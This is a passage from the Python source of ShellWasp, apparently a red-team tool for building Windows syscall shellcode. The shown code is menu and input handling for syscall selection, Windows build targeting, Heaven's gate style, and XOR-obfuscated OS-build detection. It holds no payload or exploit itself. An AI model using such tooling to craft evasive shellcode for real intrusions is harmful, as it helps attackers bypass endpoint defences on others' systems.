build.{}\\n\".format(cya+\"2\"+res,mag+\"usd\" +res, togU,\"-\"+yel,cya+ \"User_Shared_Data\"+yel,res)\r\n\ttext+=red+\"\\t\\t\\tSupported:\"+res+\" Windows 10-11\\n\"\r\n\r\n\ttext+=yel+\" {}\\t {} {} {} Encode {} to determine OS build with XOR key {}.{}\\n\".format(cya+\"3\"+res,mag+\"encode\" +res, togE,\"-\"+yel,cya+ \"User_Shared_Data\"+yel,cya+hex(sh.encodeUSDKey),res)\r\n\ttext+=yel+\" {}\\t {} {} {} Change XOR key for encoding {}.\\n\".format(cya+\"4\"+res,mag+\"xor\" +res,togK,\"-\"+yel,cya+\"User_Shared_Data\"+res)\r\n\ttext+=yel+\" {}\\t {} {} {} Get {} by adding {} to starting value, {}.{}\\n\".format(cya+\"5\"+res,mag+\"add\" +res, togA,\"-\"+yel,cya+ \"User_Shared_Data\"+yel,gre+hex(sh.addUSDVal)+yel,cya+hex(0x7ffe0260 -sh.addUSDVal) +yel,res)\r\n\ttext+=yel+\" {}\\t {} {} {} Change value to add to get {}.{}\\n\".format(cya+\"6\"+res,mag+\"add_val\" +res, togAV,\"-\"+yel,cya+ \"User_Shared_Data\"+yel,res)\r\n\ttext+=yel+\" {}\\t {} {} {} Show this submenu.{}\\n\".format(cya+\"h\"+res,mag+\"display\" +res, \"\",\"-\"+res,res)\r\n\r\n\ttext+=gre+\"\\n Note:\"+res+\" The User_Shared_Data on \"+cya+\"Win7\"+res+\" does\"+mag+\" not\"+res+\" contain the OS Build, so this can only\\n be used if no Win7 OS builds are targeted. If selected, ShellWasp will use if allowable.\\n\"\r\n\r\n\tprint (text)\r\ndef selectUserShared():\t\t\t\r\n\tselectUserSharedOptions()\r\n\tuserIN=\"\"\r\n\twhile userIN != \"e\" or userIN !=\"x\":\t\t#Loops on keyboard input\r\n\t\ttry:\t\t\t#Will break the loop on entering x\r\n\t\t\tprint(yel + \" ShellWasp>\"+ cya+\"Style>\" + mag + \"User_Shared_Data>\" +res, end=\"\")\r\n\t\t\tuserIN = input()\r\n\t\t\tprint(res)\r\n\t\t\tif userIN[0:1] == \"1\" or userIN[0:2] == \"fs\":\r\n\t\t\t\tsh.useSharedData=False\r\n\t\t\t\tprint (\" Use User_Shared_Data: \", mag+str(sh.useSharedData)+res)\r\n\t\t\telif userIN[0:1] == \"2\" or userIN[0:16].lower() == \"usd\".lower() or userIN[0:3].lower() == \"User\".lower():\r\n\t\t\t\tif sh.useSharedData==False:\r\n\t\t\t\t\tsh.useSharedData=True\r\n\t\t\t\telse:\r\n\t\t\t\t\tsh.useSharedData=False\r\n\t\t\t\tprint (\" Use User_Shared_Data: \", mag+str(sh.useSharedData)+res)\r\n\t\t\telif userIN[0:1] == \"3\" or userIN[0:6].lower() == \"encode\".lower():\r\n\t\t\t\tif not sh.encodeUSD:\r\n\t\t\t\t\tsh.encodeUSD=True\r\n\t\t\t\telse:\r\n\t\t\t\t\tsh.encodeUSD=False\r\n\t\t\t\tprint (\" Encode User_Shared_Data: \", mag+str(sh.encodeUSD)+res)\r\n\t\t\telif userIN[0:1] == \"4\" or userIN[0:3].lower() == \"xor\".lower():\r\n\t\t\t\thexInput=input(\" Enter hexadecimal XOR key: \")\r\n\t\t\t\ttry: \r\n\t\t\t\t\tsh.encodeUSDKey=int(hexInput,16)\r\n\t\t\t\texcept:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tsh.encodeUSDKey=int(\"0x\"+hexInput,16)\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint (red+\" Unacceptable input.\"+res)\r\n\t\t\t\tprint (\" XOR key: \" + mag+hex(sh.encodeUSDKey)+res)\r\n\t\t\telif userIN[0:1] == \"5\" or userIN[0:3].lower() == \"add\".lower():\r\n\t\t\t\tif not sh.addUSD:\r\n\t\t\t\t\tsh.addUSD=True\r\n\t\t\t\telse:\r\n\t\t\t\t\tsh.addUSD=False\r\n\t\t\t\tprint (\" Add User_Shared_Data: \", mag+str(sh.encodeUSD)+res)\t\t\t\t\r\n\t\t\telif userIN[0:1] == \"6\" or userIN[0:7].lower() == \"add_val\".lower():\r\n\t\t\t\tprint(\" ShellWasp gets the {} by adding two values to get {}.\".format(cya+\"User_Shared_Data\"+res, cya+\"0x7ffe0260\"+res))\r\n\t\t\t\tprint(\" Supply the value to be added; ShellWasp will calcuate the starting point.\\n\".format(cya+\"User_Shared_Data\"+res))\r\n\r\n\t\t\t\thexInput=input(\" Enter hexadecimal add value: \")\r\n\t\t\t\ttemp=0\r\n\t\t\t\ttry: \r\n\t\t\t\t\ttemp=int(hexInput,16)\r\n\t\t\t\t\tif len(hex(temp))>10:\r\n\t\t\t\t\t\tprint (\" Input is too large.\")\r\n\t\t\t\t\telif temp>0x7ffe0260:\r\n\t\t\t\t\t\tprint (\" Select a value less than \"+cya+\"0x7ffe0260.\"+res)\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tsh.addUSDVal=temp\r\n\t\t\t\texcept:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\ttemp=int(\"0x\"+hexInput,16)\r\n\t\t\t\t\t\tif len(hex(temp))>10:\r\n\t\t\t\t\t\t\tprint (\" Input is too large.\")\r\n\t\t\t\t\t\telif temp>0x7ffe0260:\r\n\t\t\t\t\t\t\tprint (\" Select a value less than \"+cya+\"0x7ffe0260.\"+res)\r\n\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tsh.addUSDVal=temp\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint (red+\" Unacceptable input.\"+res,temp )\r\n\t\t\t\ttext=\" ShellWasp will add {} to {} to get {}\\n\".format(mag + hex(sh.addUSDVal)+res, mag + hex(0x7ffe0260-sh.addUSDVal)+res, cya+\"User_Shared_Data\"+res )\r\n\t\t\t\tprint(text)\r\n\r\n\t\t\telif userIN[0:1] == \"q\" or userIN[0:1] == \"x\":\r\n\t\t\t\tbreak\t\t\t\r\n\t\t\telif userIN[0:1] == \"h\" or userIN[0:7] == \"display\":\r\n\t\t\t\tselectUserSharedOptions()\r\n\t\t\telse:\r\n\t\t\t\tprint(\" Invalid input. Enter \" + red + \"x\"+res+\" to exit Style.\\n\")\r\n\t\texcept Exception as e:\r\n\t\t\tprint (e)\r\n\t\t\tprint(traceback.format_exc())\r\n\t\t\tprint (\"exception\")\r\ndef uiSyscallStyle():\r\n\ttext = \" {} {} {} {} \\n\".format(cya + \"s\"+res,\"-\",gre+\"Change syscall style.\"+ res, \"[\" +mag+sh.style +res+\"]\")\r\n\tif sh.style==\"x64\":\r\n\t\ttext+=yel+\"\\tThis choice invokes Heaven's gate and executes {} instead of {} \\n\".format(cya+\"x64 code\"+yel, cya+\"fs:[0xc0]\"+res)\r\n\telif sh.style==\"fs\":\r\n\t\ttext+=yel+\"\\tThis choice invokes the syscall with {}\\n\".format(cya+\"fs:[0xc0]\"+res)\r\n\ttext += \" {} {} {} {} \\n\".format(cya + \"b\"+res,\"-\",gre+\"Change how x64 code is represented.\"+ res, \"[\" +mag+sh.intendedCompiler +res+\"]\")\r\n\r\n\tif sh.intendedCompiler==\"nasm\":\r\n\t\ttext+=yel+\"\\tThis prepares x64 code in the style of {} - intended for compilers such as {} \\n\".format(cya+\"db 0xde,0xad,0xbe,0xef\"+yel, cya+\"NASM\"+res)\r\n\telif sh.intendedCompiler==\"inlineVS\":\r\n\t\ttext+=yel+\"\\tThis prepares x64 code for {} using emit, e.g. {}\\n\".format(cya+\"VisualStudio inline Assembly\"+yel,cya+\"_emit 0xde\"+res)\r\n\ttext+=yel+\"\\tIf using x64 style, then we must transition from 32-bit to 64-bit code. {}\\n\".format(res)\r\n\r\n\ttemp=[]\r\n\tif sh.useSharedData:\r\n\t\ttemp.append(\"USD\")\r\n\tif sh.user12Teb:\r\n\t\ttemp.append(\"r12_PEB\")\r\n\telse:\r\n\t\ttemp.append(\"fs_PEB\")\r\n\r\n\r\n\tif len(temp)==1:\r\n\t\ttemp1=temp[0]\r\n\telse:\r\n\t\ttemp1=\"\"\r\n\t\tfor each in temp:\r\n\t\t\ttemp1+=cya+each+res+\",\"\r\n\t\ttemp1=temp1[:-1]\r\n\ttempOut=\"[{}]\".format(cya+temp1+res)\r\n\r\n\t# text += \" {} {} {} {} \\n\".format(cya + \"d\"+res,\"-\",gre+\"Use\"+cya+\" User_Shared_Data\"+gre+\" for Win10/11 to identify OS builds.\"+ res, togSD)\r\n\ttext += \" {} {} {} {} \\n\".format(cya + \"o\"+res,\"-\",gre+\"Change how OSBuild is identified\"+ res,tempOut)\r\n\r\n\r\n\r\n\tprint (text)\r\n\tprint(\" Enter command to make changes. \\n\")\r\n\r\n\tprint(\" Type\"+red+ \" q \" +res+\"or \"+red+ \" x \" +res+\"to exit Style submenu.\\n\")\r\n\tuserIN=\"\"\r\n\twhile userIN != \"e\" or userIN !=\"x\":\t\t#Loops on keyboard input\r\n\t\ttry:\t\t\t#Will break the loop on entering x\r\n\t\t\tprint(yel + \" ShellWasp>\"+ cya+\"Style> \" + res, end=\"\")\r\n\t\t\tuserIN = input()\r\n\t\t\tprint(res)\r\n\t\t\tif userIN[0:1] == \"x\":\r\n\t\t\t\tbreak\r\n\t\t\tif userIN[0:1] == \"q\":\r\n\t\t\t\tbreak\r\n\t\t\telif userIN[0:1] == \"c\" or userIN[0:1] == \"s\":\r\n\t\t\t\tselectSyscallStyle()\r\n\t\t\telif userIN[0:1] == \"o\":\r\n\t\t\t\tselectFindOSBuild()\r\n\t\t\telif userIN[0:1] == \"b\":\r\n\t\t\t\tselectCompilerStyle()\r\n\t\t\telif userIN[0:1] == \"h\":\t# \"find assembly instrucitons associated with shellcode\"\r\n\t\t\t\tuiSyscallStyle()\r\n\t\t\telif userIN[0:1] == \"d\":\t# \"find assembly instrucitons associated with shellcode\"\r\n\t\t\t\t# selectUserShared()\r\n\t\t\t\tselectFindOSBuild()\r\n\r\n\t\t\t\r\n\t\t\telse:\r\n\t\t\t\tprint(\" Invalid input. Enter \" + red + \"x\"+res+\" to exit Style.\\n\")\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tprint (e)\r\n\t\t\tprint(traceback.format_exc())\r\n\t\t\tprint (\"exception\")\r\n\r\n\treturn\r\n\twhile True:\r\n\t\tprint (yel+ \" ShellWasp>\" + cya + \"Style>\" + res, end=\"\")\r\n\t\t\r\n\t\t# x = sys.stdin.read()\r\n\t\tans=[]\r\n\t\tfor line in sys.stdin:\r\n\r\n\t\t\tif 'q' == line.rstrip() or 'x' == line.rstrip():\r\n\t\t\t\tbreak\r\n\t\t\tans.append(line.rstrip())\r\n\t\t# print(f'Input : {line}')\r\n\t\t# print (ans)\r\n\r\n\t\tfor ch in ans:\r\n\t\t\ttry:\r\n\t\t\t\tpossible = builds.releaseOptions[ch]\r\n\t\t\t\tif possible not in sh.osChoices2:\r\n\t\t\t\t\tif possible != \"21H3\":\r\n\t\t\t\t\t\tsh.osChoices2.append(possible)\r\n\t\t\t\t\t\twinVersion=builds.winOSReverseLookup[possible]\r\n\t\t\t\t\t\tprint (\"\\t\"+cya+winVersion+\": \" + possible + \" has been added.\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tprint (red+\"21H3 is not supported at this time.\"+res)\r\n\t\t\texcept:\r\n\t\t\t\tprint (red+ch+\" was not accepted. Check spelling.\"+res)\r\n\t\t# sanitizeSyscalls()\r\n\t\tcheckWinOSBools()\r\n\r\n\t\tbreak\r\n\r\ndef uiAddWinReleases():\r\n\t# self.win10ReverseLookup={\"19044\":\"21h2, Win10\", \"19043\":\"21h1, Win10\", \"19042\":\"20h2, Win10\", \"19041\":\"2004, Win10\", \"18363\":\"1909, Win10\", \"18362\":\"1903, Win10\", \"17763\":\"1809, Win10\", \"17134\":\"1803, Win10\", \"16299\":\"1709, Win10\", \"15063\":\"1703, Win10\", \"14393\":\"1607, Win10\", \"10586\":\"1511, Win10\", \"10240\":\"1507\"}\r\n\tcheckWinOSBools()\r\n\tprint (cya+\"\\nWindows 10:\\t\\t\\t\\tWindows 7:\"+res)\r\n\tlistWin10=[\"22h2\", \"21h2\", \"21h1\", \"20h2\", \"2004\", \"1909\", \"1903\", \"1809\", \"1803\", \"1709\", \"1703\", \"1607\", \"1511\", \"1507\"]\r\n\tlistWin10Back=[\"4A65\", \"4A64\", \"21h1\", \"20h2\", \"2004\", \"1909\", \"1903\", \"1809\", \"1803\", \"1709\", \"1703\", \"1607\", \"1511\", \"1507\"]\r\n\r\n\tlistWin11=[\"22h2\",\"21h2\"]\r\n\tlistWin11Back=[\"585D\", \"55F0\"]\r\n\r\n\tlistWin7=[\"SP1\", \"SP0\"]\r\n\tlistWin7Back=[\"1DB1\",\"1DB0\"]\r\n\t\r\n\tlistWin10Codes=[\"r14\", \"r13\", \"r12\", \"r11\", \"r10\", \"r9\", \"r8\", \"r7\", \"r6\", \"r5\", \"r4\", \"r3\", \"r2\", \"r1\"]\r\n\tlistWin7Codes=[\"sp1\", \"sp0\"]\r\n\tlistWin11Codes=[\"b2\", \"b1\"]\r\n\ttext=\"\"\r\n\tt=0\r\n\tstop=0\r\n\ttotalWin10=len(listWin10)\r\n\tremaining=totalWin10\r\n\tfor x in range(2):\r\n\t\twinlookUp=listWin10Back[t]\r\n\t\tif (builds.winOSBoolSelected[winlookUp]):\r\n\t\t\tt1=\"X\"\r\n\t\telse:\r\n\t\t\tt1=\" \"\r\n\t\twinlookUp=listWin7Back[t]\r\n\t\tif (builds.winOSBoolSelected[winlookUp]):\r\n\t\t\tt2=\"X\"\r\n\t\telse:\r\n\t\t\tt2=\" \"\r\n\t\twin10TogBool=res+\"[\"+gre+t1+res+\"]\"\r\n\t\twin7TogBool=res+\"[\"+gre+t2+res+\"]\"\r\n\r\n\t\ttext += \"\\t{}\\t{}\\t{}\\t\\t\\t{}\\t{}\\t{}\\n\".format(yel+listWin10Codes[t]+res, listWin10[t],win10TogBool, yel+listWin7Codes[t]+res, listWin7[t],win7TogBool)\r\n\t\tt+=1\r\n\r\n\tfor x in range(1):\r\n\t\twinlookUp=listWin10Back[t]\r\n\t\tif (builds.winOSBoolSelected[winlookUp]):\r\n\t\t\tt1=\"X\"\r\n\t\telse:\r\n\t\t\tt1=\" \"\r\n\t\twin10TogBool=res+\"[\"+gre+t1+res+\"]\"\r\n\t\ttext += \"\\t{}\\t{}\\t{}\\t\\t{}\\t\\n\".format(yel+listWin10Codes[t]+res, listWin10[t],win10TogBool, cya+\"Windows 11:\"+res)\r\n\t\tt+=1\r\n\t\r\n\tw=0\r\n\tfor x in range(2):\r\n\t\twinlookUp=listWin10Back[t]\r\n\t\tif (builds.winOSBoolSelected[winlookUp]):\r\n\t\t\tt1=\"X\"\r\n\t\telse:\r\n\t\t\tt1=\" \"\r\n\t\twinlookUp=listWin11Back[w]\r\n\t\tif (builds.winOSBoolSelected[winlookUp]):\r\n\t\t\tt2=\"X2\"\r\n\t\telse:\r\n\t\t\tt2=\" \"\r\n\r\n\t\twin10TogBool=res+\"[\"+gre+t1+res+\"]\"\r\n\t\twin11TogBool=res+\"[\"+gre+t2+res+\"]\"\r\n\r\n\t\ttext += \"\\t{}\\t{}\\t{}\\t\\t\\t{}\\t{}\\t{}\\n\".format(yel+listWin10Codes[t]+res, listWin10[t],win10TogBool, yel+listWin11Codes[w]+res, listWin11[w],win11TogBool)\r\n\t\tt+=1\t\r\n\t\tw+=1\r\n\tfor x in range(9):\r\n\t\twinlookUp=listWin10Back[t]\r\n\t\tif (builds.winOSBoolSelected[winlookUp]):\r\n\t\t\tt1=\"X\"\r\n\t\telse:\r\n\t\t\tt1=\" \"\r\n\t\twin10TogBool=res+\"[\"+gre+t1+res+\"]\"\r\n\t\ttext += \"\\t{}\\t{}\\t{}\\t\\t\\t\\n\".format(yel+listWin10Codes[t]+res, listWin10[t],win10TogBool)\r\n\t\tt+=1\t\r\n\t\r\n\ttext += \" {} \\n\".format(cya + \"c\"+res+\" -\"+yel+\" Clear current selections.\"+ res)\r\n\r\n\tprint (text)\r\n\tprint(\" This will add to existing Windows releases. \\n\")\r\n\r\n\tprint(\" Enter the above Windows release codes in yellow. Separate each release with a \"+red+\"newline\"+res+\".\\n\")\r\n\tprint(\" Type\"+red+ \" q \" +res+\"or \"+red+ \" x \" +res+\"on a single line to end input.\\n\")\r\n\r\n\twhile True:\r\n\t\tprint (yel+ \" ShellWasp>\" + cya + \"WinReleases>\" + res+ red + \"Input>\" + res, end=\"\")\r\n\t\t\r\n\t\t# x = sys.stdin.read()\r\n\t\tans=[]\r\n\t\tfor line in sys.stdin:\r\n\r\n\t\t\tif 'q' == line.rstrip() or 'x' == line.rstrip():\r\n\t\t\t\tbreak\r\n\t\t\tans.append(line.rstrip())\r\n\t\t# print(f'Input : {line}')\r\n\t\t# print (ans)\r\n\r\n\t\tfor ch in ans:\r\n\t\t\ttry:\r\n\t\t\t\tpossible = builds.releaseOptions[ch]\r\n\t\t\t\tif possible not in sh.osChoices2:\r\n\t\t\t\t\tif possible != \"21H3\":\r\n\t\t\t\t\t\tsh.osChoices2.append(possible)\r\n\t\t\t\t\t\twinVersion=builds.winOSReverseLookup[possible]\r\n\t\t\t\t\t\tprint (\"\\t\"+cya+winVersion+\": \" + possible + \" has been added.\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tprint (red+\"21H3 is not supported at this time.\"+res)\r\n\t\t\texcept:\r\n\t\t\t\tprint (red+ch+\" was not accepted. Check spelling.\"+res)\r\n\t\t# sanitizeSyscalls()\r\n\t\tcheckWinOSBools()\r\n\r\n\t\tbreak\r\n\r\ndef uiAddSyscalls():\r\n\tprint(\" This will add to existing syscalls present. Syscalls may be called more than once.\\n\")\r\n\r\n\tprint(\" Enter syscalls below. Selections are case insensitive. Separate each syscall with a \"+red+\"newline\"+res+\".\\n\")\r\n\tprint(\" Type\"+red+ \" q \" +res+\"or \"+red+ \" x \" +res+\"on a single line to end input.\\n\")\r\n\r\n\twhile True:\r\n\t\tprint (yel+ \" ShellWasp>\" + cya + \"Syscalls>\" + res+ red + \"Input>\" + res, end=\"\")\r\n\t\t\r\n\t\t# x = sys.stdin.read()\r\n\t\tans=[]\r\n\t\ttempSys=[]\r\n\t\ttempSys.clear()\r\n\t\tfor line in sys.stdin:\r\n\r\n\t\t\tif 'q' == line.rstrip() or 'x' == line.rstrip():\r\n\t\t\t\tbreak\r\n\t\t\tans.append(line.rstrip())\r\n\t\t\ttempSys.append(line.rstrip())\r\n\t\t\t# tempSys.add(line.rstrip())\r\n\t\t# print(f'Input : {line}')\r\n\t\t# print (ans)\r\n\t\tsh.list_of_syscalls.extend(ans)\r\n\t\tsanitizeSyscalls()\r\n\t\ttempSys2=sanitizeSyscallsAdded(tempSys)\r\n\r\n\t\tprint (cya+\"Syscalls added:\")\r\n\t\tfor each in tempSys2:\r\n\t\t\tprint (\"\\t\",each)\r\n\t\tbreak\r\n# print(\"Exit\")\r\n\r\ndef uiShowWinReleases(number=None):\r\n\t# self.win10ReverseLookup={\"19044\":\"21h2, Win10\", \"19043\":\"21h1, Win10\", \"19042\":\"20h2, Win10\", \"19041\":\"2004, Win10\", \"18363\":\"1909, Win10\", \"18362\":\"1903, Win10\", \"17763\":\"1809, Win10\", \"17134\":\"1803, Win10\", \"16299\":\"1709, Win10\", \"15063\":\"1703, Win10\", \"14393\":\"1607, Win10\", \"10586\":\"1511, Win10\", \"10240\":\"1507\"}\r\n\t# \tself.win10ReverseLookupHex={\"4A64\": \"21h2\", \"4A63\": \"21h1\", \"4A62\": \"20h2\", \"4A61\": \"2004\", \"47BB\": \"1909\", \"47BA\": \"1903\", \"4563\": \"1809\", \"42EE\": \"1803\", \"3FAB\": \"1709\", \"3AD7\": \"1703\", \"3839\": \"1607\", \"295A\": \"1511\", \"2800\": \"1507\"}\r\n\t# \t# Win11 21h2 build 22000 55F0\r\n\t# \tself.win11ReverseLookupHex={\"55F0\":\"21h2\"}\r\n\t# \tself.win11ReverseLookup={\"22000\":\"21h2, Win11\"}\r\n\t# \tself.winOSReverseLookupHex={\"4A64\": \"Windows 10\", \"4A63\": \"Windows 10\", \"4A62\": \"Windows 10\", \"4A61\": \"Windows 10\", \"47BB\": \"Windows 10\", \"47BA\": \"Windows 10\", \"4563\": \"Windows 10\", \"42EE\": \"Windows 10\", \"3FAB\": \"Windows 10\", \"3AD7\": \"Windows 10\", \"3839\": \"Windows 10\", \"295A\": \"Windows 10\", \"2800\": \"Windows 10\", \"55F0\":\"Windows 11\", \"1DB0\":\"Windows 7\", \"1DB1\":\"Windows 7\", \"4F7C\":\"Windows Server 2022\"}\r\n\t# \t# Windows Server 2022 build 20348 4F7C\r\n\t# \t# Windows 7 Sp0 7600 1DB0\r\n\t# \t# Windows 7 Sp1 7601 1DB1\r\n\t# \tself.win7ReverseLookupHex={\"1DB0\":\"SP0\", \"1DB1\":\"SP1\"}\r\n\t# \tself.win7ReverseLookup={\"7600\":\"Win7, Sp0\", \"7601\":\"Win7, Sp1\"}\r\n\t# \tself.winServer22ReverseLookupHex={\"4F7C\":\"20348, Windows Server 2022\"}\r\n\tif number==None:\r\n\t\tprint (\"\\tCurrent Windows release selections:\")\r\n\t\tfor osChoice in sh.osChoices2:\r\n\t\t\twinRelease=\"\"\r\n\t\t\twinVersion=builds.winOSReverseLookup[osChoice]\r\n\t\t\tif winVersion==\"Windows 10\":\r\n\t\t\t\twinRelease=builds.win10ReverseLookupBackup[osChoice]\r\n\t\t\telif winVersion==\"Windows 7\":\r\n\t\t\t\twinRelease=builds.win7ReverseLookupHex[osChoice]\r\n\t\t\telif winVersion==\"Windows 11\":\r\n\t\t\t\twinRelease=builds.win11ReverseLookupHex[osChoice]\r\n\r\n\t\t\tprint (\"\\t\",gre +osChoice+res+\"\\t\", winVersion,\"\\t\",winRelease )\r\n\telif number==\"edit\":\r\n\t\tprint (\"\\tCurrent Windows release selections:\")\r\n\t\t\r\n\t\tt=0\r\n\t\tfor osChoice in sh.osChoices2:\r\n\t\t\twinRelease=\"\"\r\n\t\t\twinVersion=builds.winOSReverseLookup[osChoice]\r\n\t\t\tif winVersion==\"Windows 10\":\r\n\t\t\t\twinRelease=builds.win10ReverseLookupBackup[osChoice]\r\n\t\t\telif winVersion==\"Windows 7\":\r\n\t\t\t\twinRelease=builds.win7ReverseLookupHex[osChoice]\r\n\t\t\telif winVersion==\"Windows 11\":\r\n\t\t\t\twinRelease=builds.win11ReverseLookupHex[osChoice]\r\n\r\n\t\t\tprint (\"\\t\",cya+str(t),\"\\t\",gre +osChoice+res+\"\\t\", winVersion,\"\\t\",winRelease )\r\n\t\t\tt+=1\r\n\r\n\r\ndef uiShowSyscalls(number=None):\r\n\tif number==None:\r\n\t\tprint (\"\\tCurrent Syscall Selections:\")\r\n\t\tfor each in sh.list_of_syscalls:\r\n\t\t\tprint (\"\\t\",gre +each+res)\r\n\telif number==\"edit\":\r\n\t\tprint (\"\\tCurrent Syscall Selections:\")\r\n\t\tt=0\r\n\t\tfor each in sh.list_of_syscalls:\r\n\t\t\tprint (\"\\t\",cya+str(t),\"\\t\", gre +each+res)\r\n\t\t\tt+=1\r\n\r\ndef uiRearrangeSyscalls():\r\n\tuiShowSyscalls(\"edit\")\r\n\t\r\n\tprint(\" Enter desired order of syscalls to appear in the shellcode, one per line.\\n\")\r\n\tprint(\" Syscalls not listed are removed. Syscalls can be used more than once.\\n\")\r\n\r\n\t\r\n\tprint(\" Type\"+red+ \" q \" +res+\"or \"+red+ \" x \" +res+\"on a single line to end input.\\n\")\r\n\t\r\n\twhile True:\r\n\t\tprint (yel+ \" ShellWasp>\" + cya + \"Syscalls>\" + res+ red + \"Rearrange>\" + res, end=\"\")\r\n\t\t\r\n\t\t# x = sys.stdin.read()\r\n\t\tans=[]\r\n\t\tfor line in sys.stdin:\r\n\r\n\t\t\tif 'q' == line.rstrip() or 'x' == line.rstrip():\r\n\t\t\t\tbreak\r\n\t\t\tans.append(int(line.rstrip()))\r\n\t\t# print(f'Input : {line}')\r\n\t\t# print (ans)\r\n\t\ttemp=\tsh.list_of_syscalls.copy()\r\n\t\tsh.list_of_syscalls.clear()\r\n\t\tfor new in ans:\r\n\t\t\ttry:\r\n\t\t\t\tnew=temp[new]\r\n\t\t\t\tsh.list_of_syscalls.append(new)\r\n\t\t\texcept:\r\n\t\t\t\tprint (red+\"\\t\"+str(new)+\" is not valid input.\"+res)\r\n\t\tprint(\"\\t\"+cya+\"Syscalls have been rearranged.\\n\"+res)\r\n\t\tuiShowSyscalls()\r\n\t\tbreak\r\ndef uiEditWinReleases():\r\n\tuiShowWinReleases(\"edit\")\r\n\t\r\n\tprint(\" Enter the numbers corresponding to each Windows release to be removed, one per line.\\n\")\r\n\t\r\n\tprint(\" Type\"+red+ \" q \" +res+\"or \"+red+ \" x \" +res+\"on a single line to end input.\\n\")\r\n\t\r\n\twhile True:\r\n\t\tprint (yel+ \" ShellWasp>\" + cya + \"WinReleases>\" + res+ red + \"Edit>\" + res, end=\"\")\r\n\t\t\r\n\t\t# x = sys.stdin.read()\r\n\t\tans=[]\r\n\t\tfor line in sys.stdin:\r\n\r\n\t\t\tif 'q' == line.rstrip() or 'x' == line.rstrip():\r\n\t\t\t\tbreak\r\n\t\t\ttry:\r\n\t\t\t\tans.append(int(line.rstrip()))\r\n\t\t\texcept:\r\n\t\t\t\tprint(red+line.rstrip() + \" is not an integer.\"+res)\r\n\t\t\t\r\n\t\t\t\t# print(traceback.format_exc())\r\n\t\t# print(f'Input : {line}')\r\n\t\t# print (ans)\r\n\t\t# print(sh.osChoices2)\r\n\t\ttemp=\tsh.osChoices2.copy()\r\n\t\t\r\n\t\t# print (\"ans\", ans)\r\n\t\tfor removeMe in ans:\r\n\t\t\ttry:\r\n\t\t\t\tdestroy=temp[removeMe]\r\n\t\t\t\tsh.osChoices2.remove(destroy)\r\n\t\t\t\tprint(\"\\t\"+cya+destroy+\" has been removed.\"+res)\r\n\t\t\texcept:\r\n\t\t\t\tprint (\"\\t\"+red+str(removeMe) +\" is not valid input.\"+res)\r\n\t\t\t\r\n\t\t\t\t# print(traceback.format_exc())\r\n\t\t# print (sh.osChoices2)\r\n\t\tbreak\r\n\r\ndef uiEditSyscalls():\r\n\tuiShowSyscalls(\"edit\")\r\n\r\n\t\r\n\tprint(\" Enter the numbers corresponding to each syscall to be removed, one per line.\\n\")\r\n\t\r\n\tprint(\" Type\"+red+ \" q \" +res+\"or \"+red+ \" x \" +res+\"on a single line to end input.\\n\")\r\n\t\r\n\twhile True:\r\n\t\tprint (yel+ \" ShellWasp>\" + cya + \"Syscalls>\" + res+ red + \"Edit>\" + res, end=\"\")\r\n\t\t\r\n\t\t# x = sys.stdin.read()\r\n\t\tans=set()\r\n\t\tfor line in sys.stdin:\r\n\r\n\t\t\tif 'q' == line.rstrip() or 'x' == line.rstrip():\r\n\t\t\t\tbreak\r\n\t\t\ttry:\r\n\t\t\t\tans.add(int(line.rstrip()))\r\n\t\t\texcept:\r\n\t\t\t\tprint (\"\\n\"+red+ line.rstrip()+\" is not a valid integer.\"+res)\r\n\t\t# print(f'Input : {line}')\r\n\t\t# print (ans)\r\n\t\ttemp=\tsh.list_of_syscalls.copy()\r\n\t\t\r\n\t\tfor removeMe in ans:\r\n\t\t\ttry:\r\n\t\t\t\tdestroy=temp[removeMe]\r\n\t\t\t\tsh.list_of_syscalls.remove(destroy)\r\n\t\t\t\tprint(\"\\t\"+cya+destroy + \" has been removed.\"+res)\r\n\r\n\t\t\texcept:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tprint(\"\\t\"+red+removeMe + \" is not valid input.\"+res)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(\"\\t\"+red+str(removeMe) + \" is not valid input.\"+res)\r\n\r\n\t\tbreak\r\n\r\ndef uiShowOptionsMainMenu():\r\n\ttext=\"\\n\"\r\n\ttext += \" {} \\n\".format(cya + \"b\"+res+\" -\"+gre+\" Build syscall shellcode.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"B\"+res+\" -\"+gre+\" Build syscall shellcode (with sample values (\"+yel+\"new\"+gre+\").\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"A\"+res+\" -\"+gre+\" Build syscall shellcode (with sample values using AI (\"+yel+\"new\"+gre+\").\"+ res)\r\n\r\n\ttext += \" {} \\n\".format(cya + \"p\"+res+\" -\"+gre+\" Save current syscall shellcode to file.\"+ res)\r\n\r\n\ttext += \" {} \\n\".format(cya + \"i\"+res+\" -\"+gre+\" Add or modify syscalls.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"w\"+res+\" -\"+gre+\" Add or modify Windows releases.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"s\"+res+\" -\"+gre+\" Syscall style configuration.\"+ res)\r\n\r\n\ttext += \" {} \\n\".format(cya + \"c\"+res+\" -\"+gre+\" Save config file [\"+res+\"config.cfg\"+gre+\"] with current selections.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"h\"+res+\" -\"+gre+\" Display options.\"+ res)\r\n\r\n\tprint (text)\r\n\r\ndef uiShowOptionsSyscallSelections():\r\n\ttext=\"\\n\"\r\n\ttext += \" {} \\n\".format(cya + \"c\"+res+\" -\"+yel+\" Clear current selections.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"a\"+res+\" -\"+yel+\" Add syscalls.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"s\"+res+\" -\"+yel+\" Show current syscalls.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"e\"+res+\" -\"+yel+\" Edit current syscalls.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + 